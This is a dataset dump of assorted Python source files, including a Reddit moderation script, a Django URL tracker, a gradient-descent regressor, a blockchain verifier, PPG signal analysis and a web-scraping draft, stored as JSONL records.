params:\", num_trainable_params)\n print(\"Non-trainable params:\", total_params - num_trainable_params)\n","sub_path":"matdeeplearn/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"337425403","text":"from datetime import datetime, timedelta\n\nfrom praw import Reddit\n# from praw.exceptions import RedditAPIException\n\nr = Reddit('bot2')\n\nUNCLAIMED = 'Unclaimed'\nIN_PROGRESS = 'In Progress'\n\n\ndef remove_old_crap(posts):\n for item in posts:\n if item.link_flair_text == UNCLAIMED:\n submission_time = datetime.fromtimestamp(item.created_utc)\n if submission_time < current_time - timedelta(days=1):\n print(f\"Removing {item.name}, posted on {str(submission_time)}\")\n item.mod.remove()\n\n\nif __name__ == '__main__':\n current_time = datetime.now()\n for x in range(30):\n # I know for a fact that sometimes reddit will only show 4 posts on the page,\n # but each one of these options will only pull one of them. Just ask for all\n # of them, smash them together, and process.\n submissions = list(r.subreddit(\"transcribersofreddit\").hot(limit=None))\n submissions += list(r.subreddit(\"transcribersofreddit\").new(limit=None))\n submissions += list(r.subreddit(\"transcribersofreddit\").top(limit=None))\n submissions += list(r.subreddit(\"transcribersofreddit\").controversial(limit=None))\n remove_old_crap(submissions)\n\n # try:\n # item.reply(\n # \"This submission has been open for at least three days and is listed as in progress\"\n # \" -- it has been removed to make room for other submissions in the queue. Please contact\"\n # \" itsthejoker if there is an issue.\"\n # )\n # except RedditAPIException:\n # pass\n","sub_path":"scripts/clear_submissions_from_queue.py","file_name":"clear_submissions_from_queue.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"612825160","text":"import pandas as pd\nimport numpy as np\n\ndef load_rating(ncivs: int, bans):\n rating = pd.read_csv('civ_random/rating.csv')\n cols = rating.columns\n\n for col in cols[1:]:\n for i in range(len(rating[col])):\n try:\n rat_val = rating[col].loc[i]\n rat_val = rat_val.replace(\" \", \"\").split(sep = ',')\n rating[col].loc[i] = np.average([int(x) for x in rat_val])\n except ValueError:\n print('Incorrect value. Please, check the table.')\n\n total_rat = []\n\n for i in range(len(rating[cols[0]])):\n total_rat.append(\n rating[cols[1]].loc[i] +\n rating[cols[2]].loc[i] +\n 2 * rating[cols[3]].loc[i] +\n rating[cols[4]].loc[i]\n )\n\n rating['AVERAGE'] = total_rat\n rating = rating.sort_values(by=['AVERAGE'])\n rating = rating[~rating['Нація'].isin(bans)]\n rat_group = np.array_split(rating, ncivs)\n\n for i in range(len(rat_group)):\n rat_group[i]['POINTS'] = [i+1 for el in range(rat_group[i].shape[0])]\n\n return(pd.concat(rat_group))\n\ndef balanced_random(pl_num:int, ncivs:int, bans):\n rand_civs = [[] for i in range(pl_num)]\n rating = load_rating(ncivs, bans)\n\n for player in rand_civs:\n to_random = ncivs\n player_points = np.sum(np.arange(ncivs + 1))\n\n while to_random:\n if to_random == 1:\n rand_df = rating[\n (rating['POINTS'].values <= player_points) &\n (rating['POINTS'].values >= player_points // to_random)\n ]\n nation = rand_df.sample(n=1)\n rating = rating.drop(nation.index)\n player.append(nation['Нація'].values[0] + '.jpg')\n to_random -= 1\n\n else:\n # print(player_points-to_random+1)\n rand_df = rating[\n (rating['POINTS'].values <= player_points-to_random+1) &\n (rating['POINTS'].values >= player_points//to_random)\n ]\n nation = rand_df.sample(n=1)\n rating = rating.drop(nation.index)\n player.append(nation['Нація'].values[0] + '.jpg')\n to_random -= 1\n player_points -= nation['POINTS'].values[0]\n\n return rand_civs\n\n\n","sub_path":"civ_random/balanced_random.py","file_name":"balanced_random.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"620135815","text":"import logging\nimport warnings\n\nfrom django.db.models import signals\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.core.urlresolvers import NoReverseMatch\n\nfrom .models import URLChangeRecord\nfrom .mixins import URLTrackingMixin\n\nlogger = logging.getLogger(__file__)\n\n\nclass URLTrackingError(Exception):\n \"\"\"\n Exception raised when an error occures during URL tracking.\n \"\"\"\n pass\n\n\ndef lookup_previous_url(instance, **kwargs):\n \"\"\"\n Look up the absolute URL of *instance* from the database while it is\n in a ``pre_save`` state. The previous URLs are saved in the instance's\n *_old_urls* attribute as dictionary. The method name for the given URLs\n are used as the dictionary keys.\n\n If the instance has not been saved to the database (i.e. is new)\n the ``_old_urls`` dictionary is set to ``{}`` which will prevent a record\n to be created.\n \"\"\"\n instance._old_urls = {}\n for method_name in instance.get_url_tracking_methods():\n try:\n method = getattr(instance, method_name)\n except AttributeError:\n raise ImproperlyConfigured(\n \"model instance '%s' does not have a method '%s'\" % (\n instance.__class__.__name__,\n method_name\n )\n )\n try:\n old_url = method()\n except NoReverseMatch:\n logger.debug(\"Method's URL doesn't resolve\")\n old_url = None\n instance._old_urls[method_name] = old_url\n\n\ndef _create_delete_record(url):\n \"\"\"\n Create a delete record for the given *url*. This updates all records\n where *url* is the ``new_url`` (previous redirects). It also creates\n a new record with *url* being the ``old_url`` and no ``new_url`` and\n marked as deleted. This marks an endpoint in the chain of URL\n redirects.\n \"\"\"\n # updated existing records with the old URL being the new_url\n # of this record. Changed the *deleted* flag to be ``False``\n URLChangeRecord.objects.filter(new_url=url).update(\n new_url='',\n deleted=True\n )\n\n record, __ = URLChangeRecord.objects.get_or_create(old_url=url)\n record.deleted = True\n record.save()\n\n\ndef track_changed_url(instance, **kwargs):\n \"\"\"\n Track a URL changes for *instance* after a new instance was saved. If\n no old URLs are available (i.e. *instance* is new) or if a new and old URL\n are the same (i.e. URL is unchanged), nothing will be changed in the\n database for this URL.\n\n For URLs that have changed, the database will be checked for existing\n records that have a *new_url* entry equal to the old URL of *instance* and\n updates these records. Then, a new ``URLChangeRecord`` is created for this\n URL.\n \"\"\"\n for method_name, old_url in getattr(instance, '_old_urls', {}).items():\n try:\n new_url = getattr(instance, method_name)()\n except NoReverseMatch:\n new_url = None\n\n # we don't want to store URL changes for unchanged URL\n if not old_url or (old_url == new_url):\n continue\n\n # if the new URL is None we assume that it has been deleted and\n # create a delete record for the old URL.\n if not new_url:\n _create_delete_record(old_url)\n continue\n\n logger.debug(\n \"tracking URL change for instance '%s' URL\",\n instance.__class__.__name__\n )\n\n # check if the new URL is already in the table and\n # remove these entries\n URLChangeRecord.objects.filter(old_url=new_url).delete()\n\n # updated existing records with the old URL being\n # the new URL in the record\n url_records = URLChangeRecord.objects.filter(new_url=old_url).update(\n new_url=new_url,\n deleted=False\n )\n\n # create a new/updated record for this combination of old and\n # new URL. If the record already exists, it is assumed that the\n # current change is to be used and the existing new_url will be\n # detached from the old_url.\n\n record, __ = URLChangeRecord.objects.get_or_create(old_url=old_url)\n record.new_url = new_url\n record.deleted = False\n record.save()\n\ndef track_deleted_url(instance, **kwargs):\n \"\"\"\n Track the URL of a deleted *instance*. It updates all existing\n records with ``new_url`` being set to the *instance*'s old URL and\n marks this record as deleted URL.\n\n A new ``URLChangeRecord`` is created for the old URL of *instance*\n that is marked as deleted.\n \"\"\"\n logger.debug(\"tracking deleted instance '%s' URL\",\n instance.__class__.__name__)\n for old_url in getattr(instance, '_old_urls', {}).values():\n _create_delete_record(old_url)\n\n\ndef track_url_changes_for_model(model, absolute_url_method='get_absolute_url'):\n \"\"\"\n Register the *model* for URL tracking. It requires the *model* to provide\n an attribute ``url_tracking_methods`` and/or a ``get_url_tracking_methods``\n method to return a list of methods to retrieve trackable URLs.\n The default setup provides ``url_tracking_methods = ['get_absolute_url']``.\n\n The ``pre_save``, ``post_save`` and ``post_delete`` methods are connected\n to different tracking methods for *model* and create/update\n ``URLChangeRecord``s as required.\n \"\"\"\n if not hasattr(model, 'get_url_tracking_methods'):\n warnings.warn(\n \"the 'absolute_url_method' is deprecated, use the \"\n \"'UrlTrackingMixin' instead\",\n PendingDeprecationWarning\n )\n model.url_tracking_methods = [absolute_url_method]\n model.get_url_tracking_methods = URLTrackingMixin.get_url_tracking_methods\n\n # make sure that URL method names are specified for the given model\n if not getattr(model, 'url_tracking_methods', None):\n raise URLTrackingError(\"no URLs specified for model '%s'\" % model)\n\n signals.pre_save.connect(lookup_previous_url, sender=model, weak=False)\n signals.post_save.connect(track_changed_url, sender=model, weak=False)\n signals.post_delete.connect(track_deleted_url, sender=model, weak=False)\n","sub_path":"url_tracker/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"239989643","text":"from typing import Optional\n\nimport numpy as np\nfrom numpy.testing import assert_array_almost_equal\nfrom sklearn.base import BaseEstimator, RegressorMixin\n\n\nclass GDLinearRegression(BaseEstimator, RegressorMixin):\n \"\"\"\n Similar to sklearn.linear_model.SGDRegressor with default parameters (and learning_rate=='constant')\n that not presented in GDLinearRegression.__init__ and uses gradient descent optimization technique\n (not stochastic instead of SGDRegressor)\n \"\"\"\n\n def __init__(self,\n penalty: Optional[str] = 'l2',\n l1_ratio: float = 0.15,\n alpha: float = 0.00001,\n fit_intercept: bool = True,\n max_iter: int = 10000,\n tol: float = 1e-3,\n eta0: float = 0.01,\n random_state: Optional[int] = None):\n if random_state is None:\n self.random_state = 648\n self.rnd_gen = np.random.default_rng(self.random_state)\n self.penalty = penalty\n self.l1_ratio = l1_ratio\n self.fit_intercept = fit_intercept\n self.learning_rate = eta0\n self.alpha = alpha\n self.max_iter = max_iter\n self.tol = tol\n\n def fit(self, X, y):\n \"\"\"\n Fit model using gradient descent method\n :param X: training data\n :param y: target values for training data\n :return: None\n \"\"\"\n if self.fit_intercept:\n X = np.hstack((np.ones(X.shape[0]).reshape(-1, 1), X))\n self.w_ = self.rnd_gen.normal(size=X.shape[1], )\n for _ in range(self.max_iter):\n grad = self._grad_loss_func(X, y)\n self.w_ -= grad * self.learning_rate\n if np.sum(np.abs(grad)) < self.tol:\n break\n if self.fit_intercept:\n self.coef_ = self.w_[1:]\n self.intercept_ = self.w_[0:1]\n else:\n self.coef_ = self.w_\n return self\n\n def predict(self, X):\n \"\"\"\n Predict using model.\n :param X: test data for predict in\n :return: y_test: predicted values\n \"\"\"\n try:\n if self.fit_intercept:\n X = np.hstack((np.ones(X.shape[0]).reshape(-1, 1), X))\n return np.dot(X, self.w_)\n except:\n raise Exception(\"Model is not fitted\")\n\n def _grad_loss_func(self, X, y):\n grad = (-2*np.dot(y.T, X) + 2*np.dot(self.w_.T,\n np.matmul(X.T, X))) / X.shape[0]\n if self.penalty == 'L1':\n grad += self.l1_penalty()\n elif self.penalty == 'L2':\n grad += self.l2_penalty()\n elif self.penalty == 'elasticnet':\n grad += self.l1_penalty() + self.l2_penalty()\n\n return grad\n\n def l1_penalty(self):\n return self.alpha * np.sign(self._weights) / X.shape[0]\n\n def l2_penalty(self):\n return self.alpha * 2 * self._weights / X.shape[0]\n\n\nif __name__ == \"__main__\":\n from sklearn.linear_model import SGDRegressor\n from sklearn.datasets import make_regression\n\n X, y = make_regression()\n\n gd_reg = GDLinearRegression().fit(X, y)\n sgd_reg = SGDRegressor(learning_rate='constant').fit(X, y)\n\n assert gd_reg.coef_.shape == sgd_reg.coef_.shape\n assert gd_reg.intercept_.shape == sgd_reg.intercept_.shape\n\n from sklearn.metrics import mean_squared_error as mse\n\n assert mse(y, gd_reg.predict(X)) <= mse(y, sgd_reg.predict(X))\n","sub_path":"homeworks/SGDRegressor/src/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"372598331","text":"\"\"\"\nencoding=utf-8\n_author = youzipi\ndate = 18/7/20\n\"\"\"\n\n\"\"\"\n 存在重复\n给定一个整数数组,判断是否存在重复元素。\n\n如果任何值在数组中出现至少两次,函数返回 true。如果数组中每个元素都不相同,则返回 false。\n\n示例 1:\n\n输入: [1,2,3,1]\n输出: true\n示例 2:\n\n输入: [1,2,3,4]\n输出: false\n示例 3:\n\n输入: [1,1,1,3,3,4,3,2,4,2]\n输出: true\n\n\"\"\"\n\n\nclass Solution:\n def containsDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n uniques = {}\n for i in nums:\n if uniques.get(i) is None:\n uniques.update({i: 1})\n else:\n return True\n return False\n\n def containsDuplicate1(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n return len(nums) != len(set(nums))\n\n\nif __name__ == '__main__':\n s = Solution()\n result = s.containsDuplicate([1, 1, 1, 3, 3, 4, 3, 2, 4, 2])\n result1 = s.containsDuplicate1([1, 1, 1, 3, 3, 4, 3, 2, 4, 2])\n print(result)\n print(result1)\n","sub_path":"leetcode/array/containsDuplicate.py","file_name":"containsDuplicate.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"212011593","text":"from hash_lib import hash_new_block, hash_string\nfrom wallet import Wallet\n\n\nclass Verifier:\n\n \"\"\"\n Checks validity of blockchain by checking if previous hash of block matches the next\n\n Also checks for invalid proof of work in any of the blocks\n\n if chain is valid returns True\n \"\"\"\n @classmethod\n def verify_blockchain(self, blockchain):\n for (index, block) in enumerate(blockchain):\n # if genesis block continue\n if index == 0:\n continue\n\n # check previous hashes match for each block and preceeding block\n if block.previous_hash != hash_new_block(blockchain[index - 1]):\n return False\n\n # check for each block that the proof of work is valid\n if not self.valid_proof_of_work(block.transactions[:-1], block.previous_hash, block.proof):\n return False\n return True\n\n \"\"\"\n Verifies user has enough coins to proceed with transaction\n \"\"\"\n @staticmethod\n def verify_transaction(transaction, get_user_balance, check_funds=True):\n if check_funds:\n # verify user has enough funds and transaction data is valid\n sender_balance = get_user_balance(transaction.sender)\n return sender_balance >= transaction.amount and Wallet.verify_transaction(transaction)\n else:\n # return transaction data valid\n return Wallet.verify_transaction(transaction)\n\n \"\"\"\n loops through all open transactions and checks each transaction is valid\n \"\"\"\n @classmethod\n def verify_transactions(self, open_transactions, get_user_balance):\n is_valid = True\n # for each transaction in open transactions\n for tx in open_transactions:\n # verify transaction valid without checking for if enough funds\n if self.verify_transaction(tx, get_user_balance, False):\n is_valid = True\n else:\n is_valid = False\n\n return is_valid\n\n \"\"\"\n valid_proof_of_work\n\n returns true based on if guess hash satisfies our validation hash from proof of work method \n \"\"\"\n @staticmethod\n def valid_proof_of_work(transactions, last_hash, proof_number):\n # create a guess string using transactions, last_hash and each proof number passed in from loop\n guess = (str([tx.to_ordered_dict() for tx in transactions]) + str(last_hash) +\n str(proof_number)).encode('utf8')\n # hash the string using hash lib method\n guess_hash = hash_string(guess)\n\n # if guess hash begins with two leading 00's hash considered valid and proof number sufficient\n # hashes with leading 0's considered hard to compute\n return guess_hash[0:2] == '00'\n","sub_path":"Server/Flask/verifier.py","file_name":"verifier.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"364696493","text":"from evaluation import *\n\ndef plot(distances, legend_labels=None):\n print('Intrinsic plasticity: Plot')\n \n # distances: runs, models, h_ip, test chunks\n last_chunk = np.shape(distances)[3]-1\n #num_hip = np.shape(distances)[2]\n num_models = np.shape(distances)[1]\n \n dists_mean = np.mean(distances[:,:,:,last_chunk], axis=0)\n dists_std = np.std(distances[:,:,:,last_chunk], axis=0)\n # dists: models, h_ip\n \n num_hip = np.shape(dists_mean)[1]\n \n cols = cm.rainbow(np.linspace(0, 1, num_hip))\n \n lab = None\n if legend_labels is None:\n lab = '$c_{IP}$'\n else:\n lab = legend_labels\n \n for i in range(num_hip):\n legend = str(lab + ' = ' + str(PARA.c[IP][i]))\n plt.errorbar(np.arange(num_models)+1, dists_mean[:,i], label=legend, yerr=dists_std[:,i], marker='o', # fmt='o',\n color=cols[i], ecolor=np.append(cols[i][0:3], 0.5))\n\n plt.legend(prop={'size': LEGEND_SIZE})\n plt.xlim(xmin=0.5, xmax=num_models+0.5)\n plt.ylim(ymin=0)\n plt.xlabel('Model', color=FIG_COLOR)\n plt.ylabel('Transition error', color=FIG_COLOR)\n plt.savefig(PLOTPATH + '/h_ip.'+FILE_TYPE, format=FILE_TYPE, transparent=True)\n plt.close()\n \n \n plt.errorbar(PARA.c[ip], dists_mean[0,:], yerr=np.std(distances[:,0,:,last_chunk], axis=0), fmt='o')\n plt.xlim(xmin=np.min(PARA.c[ip])-0.5, xmax=np.max(PARA.c[ip])+0.5)\n plt.ylim(ymin=0)\n plt.xlabel('IP factor', color=FIG_COLOR)\n plt.ylabel('Transition error', color=FIG_COLOR)\n plt.savefig(PLOTPATH + '/h_ip_model1.'+FILE_TYPE, format=FILE_TYPE, transparent=True)\n plt.close()\n \n # t-Tests\n file = \"\"\n for i in range(num_hip):\n for j in range(num_hip):\n if j > i:\n res =scipy.stats.ttest_ind(distances[:,0,i,last_chunk], distances[:,0,j,last_chunk])\n file += \"c_IP \"+str(PARA.c[ip][i])+\" vs. \"+str(PARA.c[ip][j])+\": t=\"+str(res[0])+\", p=\"+str(res[1])+\"\\n\"\n text_file = open(PLOTPATH + \"/t-tests_h_ip_factor.txt\", \"w\")\n text_file.write(file)\n text_file.close()\n\ndef plot_activity(activity):\n print('Intrinsic plasticity: Plot activity')\n \n # activity: runs, models, h_ip, test chunks\n last_chunk = np.shape(activity)[3]-1\n #num_hip = np.shape(activity)[2]\n num_models = np.shape(activity)[1]\n \n act_mean = np.mean(activity[:,0,:,last_chunk], axis=0)\n act_std = np.std(activity[:,0,:,last_chunk], axis=0)\n # act: h_ip\n \n num_hip = np.shape(act_mean)[0]\n \n plt.bar(PARA.c[ip]-0.125, act_mean, 0.25, linewidth=0, yerr=act_std)\n plt.xlim(xmin=np.min(PARA.c[ip])-0.5, xmax=np.max(PARA.c[ip])+0.5)\n plt.ylim(ymin=0)\n plt.xlabel('IP factor', color=FIG_COLOR)\n plt.ylabel('Average activity', color=FIG_COLOR)\n plt.savefig(PLOTPATH + '/h_ip_activity_model1.'+FILE_TYPE, format=FILE_TYPE, transparent=True)\n plt.close()\n","sub_path":"michaelis/evaluation/ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"147490416","text":"from tensorflow import keras\r\n\r\nname = 'test_1'\r\nepochs = 20\r\nbatch_size = 32\r\nimg_dim = 128\r\nlatent_dim = 128\r\nbeta = 1.0\r\nlearning_rate = 0.0001\r\noptimizer = keras.optimizers.Adam(learning_rate=learning_rate)\r\n\r\ndemo_iterations = 100\r\ndemo_directory = f'./demo_{name}/'\r\n","sub_path":"hyperparameters.py","file_name":"hyperparameters.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"561692578","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport struct\nfrom PyEMD import EMD\nfrom detect_peaks import detect_peaks\n#from pypeaks import Data, Intervals\n\n\nPIXART_PPG_DATA = \"./Pixart_PPG/ytchen_rest_1.txt\"\nINFINITI_PPG_DATA = \"./Infiniti_PPG/ytchen_rest_1.txt\"\n\npixart_ppg_data_list = []\ninfiniti_ppg_data_list = []\ncounter_line = 0\n\nwith open(PIXART_PPG_DATA) as f:\n for line in f:\n \tif line[0:3] == \"PPG\":\n \t\tdatas = line.strip(', \\n').split(',')\n \t\tdatas = datas[3:]\n \t\tdatas = [float(i) for i in datas]\n \t\tfor data in datas:\n \t\t\tpixart_ppg_data_list.append(data)\n\npixart_ppg_data_list = pixart_ppg_data_list[::2]\n\nemd = EMD()\n\nIMFs = emd(np.array(pixart_ppg_data_list))\nN = IMFs.shape[0]+1\nEMD_Pixart_PPG_9 = IMFs[0] + IMFs[1] + IMFs[2] + IMFs[3] + IMFs[4] + IMFs[5] + IMFs[6] + IMFs[7] + IMFs[8]\nEMD_Pixart_PPG_8 = IMFs[0] + IMFs[1] + IMFs[2] + IMFs[3] + IMFs[4] + IMFs[5] + IMFs[6] + IMFs[7]\nEMD_Pixart_PPG_10 = IMFs[0] + IMFs[1] + IMFs[2] + IMFs[3] + IMFs[4] + IMFs[5] + IMFs[6] + IMFs[7] + IMFs[8] + IMFs[9] \n\nprint(\"Number of IMF is {:d}\".format(N))\n\n# plt.plot(pixart_ppg_data_list[1000:5000])\n# plt.ylabel('magnitude')\n# plt.xlabel('sample')\n# plt.show()\n\n# plt.subplot(4,1,1)\n# plt.plot(pixart_ppg_data_list[1000:5000])\n# plt.ylabel('magnitude')\n# plt.xlabel('sample')\n\n\n# plt.subplot(4,1,2)\n# plt.plot(EMD_Pixart_PPG_8[1000:5000], 'g')\n# plt.title(\"EMD_8_IMFs\")\n# plt.xlabel(\"Sample\")\n# axes = plt.gca()\n# axes.set_xlim([0,len(pixart_ppg_data_list[1000:5000])])\n# axes.set_ylim([np.amin(EMD_Pixart_PPG_8[1000:5000]),np.amax(EMD_Pixart_PPG_8[1000:5000])])\n\n# plt.subplot(4,1,3)\n# plt.plot(EMD_Pixart_PPG_9[1000:5000], 'g')\n# plt.title(\"EMD_9_IMFs\")\n# plt.xlabel(\"Sample\")\n# axes = plt.gca()\n# axes.set_xlim([0,len(pixart_ppg_data_list[1000:5000])])\n# axes.set_ylim([np.amin(EMD_Pixart_PPG_9[1000:5000]),np.amax(EMD_Pixart_PPG_9[1000:5000])])\n\n# plt.subplot(4,1,4)\n# plt.plot(EMD_Pixart_PPG_10[1000:5000], 'g')\n# plt.title(\"EMD_10_IMFs\")\n# plt.xlabel(\"Sample\")\n# axes = plt.gca()\n# axes.set_xlim([0,len(pixart_ppg_data_list[1000:5000])])\n# axes.set_ylim([np.amin(EMD_Pixart_PPG_10[1000:5000]),np.amax(EMD_Pixart_PPG_10[1000:5000])])\n\n# plt.tight_layout()\n# #plt.savefig('simple_example')\n# plt.show()\n\nind = detect_peaks(EMD_Pixart_PPG_8[1000:5000],mph=0, mpd=60, show=False)\nind = ind[1:-1] * (1/100) #sampling rate\nind_dif = np.subtract(ind[1:],ind[:-1])\nprint (ind_dif)\nmean_ind = np.mean(ind_dif)\nprint(\"Mean HR of Pixart PPG is {:f}\".format(mean_ind))\nvar_ind = np.var(ind_dif)\nprint(\"Var HR of Pixart PPG is {:f}\".format(var_ind))\n#print (pixart_ppg_data_list)\n#print (len(pixart_ppg_data_list))\n\n# plt.plot(pixart_ppg_data_list)\n# plt.ylabel('magnitude')\n# plt.xlabel('sample')\n# plt.show()\n\ncounter_line = 0\nwith open(INFINITI_PPG_DATA, 'rb') as f:\n\tfor line in f:\n\t\tif counter_line > 7:\n\t\t\tdatas = line.strip(b'\\r\\n').split(b',')\n\t\t\tinfiniti_ppg_data_list.append(float(datas[1].decode(\"utf-8\")))\n\t\tcounter_line = counter_line + 1\n\n#print (infiniti_ppg_data_list)\n#print (len(infiniti_ppg_data_list))\n\ninfiniti_ppg_data_list = infiniti_ppg_data_list[20480:102400]\n# plt.plot(infiniti_ppg_data_list)\n# plt.ylabel('magnitude')\n# plt.xlabel('sample')\n# axes = plt.gca()\n# axes.set_xlim([0,len(infiniti_ppg_data_list)])\n# plt.show()\n\nind2 = detect_peaks(np.array(infiniti_ppg_data_list),mph=0, mpd=1200, show=False)\nind2 = ind2[1:-1] * (1/2048) #sampling rate\nind_dif2 = np.subtract(ind2[1:],ind2[:-1])\nprint (ind_dif2)\nmean_ind2 = np.mean(ind_dif2)\nprint(\"Mean HR of Infiniti PPG is {:f}\".format(mean_ind2))\nvar_ind2 = np.var(ind_dif2)\nprint(\"Var HR of Infiniti PPG is {:f}\".format(var_ind2))","sub_path":"PPG/raw_data_parse.py","file_name":"raw_data_parse.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"651488877","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\n\n# optional first step, define the driver, ie chrome or Brave\ndriver = webdriver.Chrome('./chromedriver') # <- chromedriver needs to be the same version as chrome\n\n\n\n# request the data from the desired page\npage = driver.get(\"https://www.walgreens.com/storelistings/storesbycity.jsp?requestType=locator&state=ID\")\n\n# set encoding- this is the default so technically not necessary\npage.encoding = 'ISO-885901'\n\n# collect your soup!\nsoup = BeautifulSoup(page.text, 'html.parser')\n\n# can print the page output with this -> print(soup.prettify())\n\n# now lets narrow in on the data we want to collect\n\nboost_list = soup.find_all()#class_ = 'sportsbook-odds american default-color')\nfor i in boost_list[:2]: \n print('\\n',i)\n\nevent_list = soup.find_all()\nfor i in event_list[:2]:\n print('\\n',i)\n\nprint('\\nlist type', type(boost_list))\nprint('\\nlist length',len(boost_list))\n\nexample = boost_list[0] # a representative example\nexample_content = example.contents\nprint('\\nall of example.contents',example_content) # <- this prints the new odds \n\nmore_example_content = example.contents[0]\nprint('\\nattributes of one piece of example contents',more_example_content.attrs)\n\n\n\n# why does this only return one boost cell? The others are collapsed- must uncollapse them\n\n# what do the attributes mean? attributes can be accessed like dictionary keys, eg example_content['href']\n\n# how do we extract the odds value? Use a combination of classes and attributes to access the desired values\n\n\n\n\n# boost_list = soup.find_all(class_ = 'sportsbook-odds american default-color')\n# for i in boost_list[:2]: \n# print('\\nBOOsted cell body',i)\n\n# event_list = soup.find_all(class_ = 'component-101__cell__name')\n# for i in event_list[:2]:\n# print('\\nEvent names',i)\n\n# print('\\nboost list type', type(boost_list))\n# print('\\nboost list length',len(boost_list))\n\n# example = boost_list[0] # a representative example\n# example_content = example.contents\n# print('\\nall of example.contents',example_content) # <- this prints the new odds \n\n# more_example_content = example.contents[0]\n# print('\\nattributes of one piece of example contents',more_example_content.attrs)\n\n","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"190900738","text":"import pandas as pd\nimport os\nimport time\nfrom datetime import datetime\nfrom time import mktime\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nstyle.use(\"dark_background\")\nimport re\n\n#set path to files\ndirpath = os.path.dirname(__file__)\niQpath = os.path.join(dirpath, 'intraQuarter\\\\intraQuarter')\n\n#get the debt to equity ratios\ndef Key_Stats(gather=[\"Total Debt/Equity\",\n\t\t\t\t\t 'Trailing P/E',\n\t\t\t\t\t 'Price/Sales',\n\t\t\t\t\t 'Price/Book',\n\t\t\t\t\t 'Profit Margin',\n\t\t\t\t\t 'Operating Margin',\n\t\t\t\t\t 'Return on Assets',\n\t\t\t\t\t 'Return on Equity',\n\t\t\t\t\t 'Revenue Per Share',\n\t\t\t\t\t 'Market Cap',\n\t\t\t\t\t\t'Enterprise Value',\n\t\t\t\t\t\t'Forward P/E',\n\t\t\t\t\t\t'PEG Ratio',\n\t\t\t\t\t\t'Enterprise Value/Revenue',\n\t\t\t\t\t\t'Enterprise Value/EBITDA',\n\t\t\t\t\t\t'Revenue',\n\t\t\t\t\t\t'Gross Profit',\n\t\t\t\t\t\t'EBITDA',\n\t\t\t\t\t\t'Net Income Avl to Common ',\n\t\t\t\t\t\t'Diluted EPS',\n\t\t\t\t\t\t'Earnings Growth',\n\t\t\t\t\t\t'Revenue Growth',\n\t\t\t\t\t\t'Total Cash',\n\t\t\t\t\t\t'Total Cash Per Share',\n\t\t\t\t\t\t'Total Debt',\n\t\t\t\t\t\t'Current Ratio',\n\t\t\t\t\t\t'Book Value Per Share',\n\t\t\t\t\t\t'Cash Flow',\n\t\t\t\t\t\t'Beta',\n\t\t\t\t\t\t'Held by Insiders',\n\t\t\t\t\t\t'Held by Institutions',\n\t\t\t\t\t\t'Shares Short (as of',\n\t\t\t\t\t\t'Short Ratio',\n\t\t\t\t\t\t'Short % of Float',\n\t\t\t\t\t\t'Shares Short (prior ']):\n\tstatspath = iQpath+'/_KeyStats'\n\tstock_list = [x[0] for x in os.walk(statspath)] #gets the list of stocks\n\tdf = pd.DataFrame(columns = ['Date',\n\t\t\t\t\t\t\t\t 'Unix',\n\t\t\t\t\t\t\t\t 'Ticker',\n\t\t\t\t\t\t\t\t 'Price',\n\t\t\t\t\t\t\t\t 'stock_p_change',\n\t\t\t\t\t\t\t\t 'SP500',\n\t\t\t\t\t\t\t\t 'sp500_p_change',\n\t\t\t\t\t\t\t\t 'Difference',\n\t\t\t\t\t\t\t\t ##############\n\t\t\t\t\t\t\t\t 'DE Ratio',\n\t\t\t\t\t\t\t\t 'Trailing P/E',\n\t\t\t\t\t\t\t\t 'Price/Sales',\n\t\t\t\t\t\t\t\t 'Price/Book',\n\t\t\t\t\t\t\t\t 'Profit Margin',\n\t\t\t\t\t\t\t\t 'Operating Margin',\n\t\t\t\t\t\t\t\t 'Return on Assets',\n\t\t\t\t\t\t\t\t 'Return on Equity',\n\t\t\t\t\t\t\t\t 'Revenue Per Share',\n\t\t\t\t\t\t\t\t 'Market Cap',\n\t\t\t\t\t\t\t\t 'Enterprise Value',\n\t\t\t\t\t\t\t\t 'Forward P/E',\n\t\t\t\t\t\t\t\t 'PEG Ratio',\n\t\t\t\t\t\t\t\t 'Enterprise Value/Revenue',\n\t\t\t\t\t\t\t\t 'Enterprise Value/EBITDA',\n\t\t\t\t\t\t\t\t 'Revenue',\n\t\t\t\t\t\t\t\t 'Gross Profit',\n\t\t\t\t\t\t\t\t 'EBITDA',\n\t\t\t\t\t\t\t\t 'Net Income Avl to Common ',\n\t\t\t\t\t\t\t\t 'Diluted EPS',\n\t\t\t\t\t\t\t\t 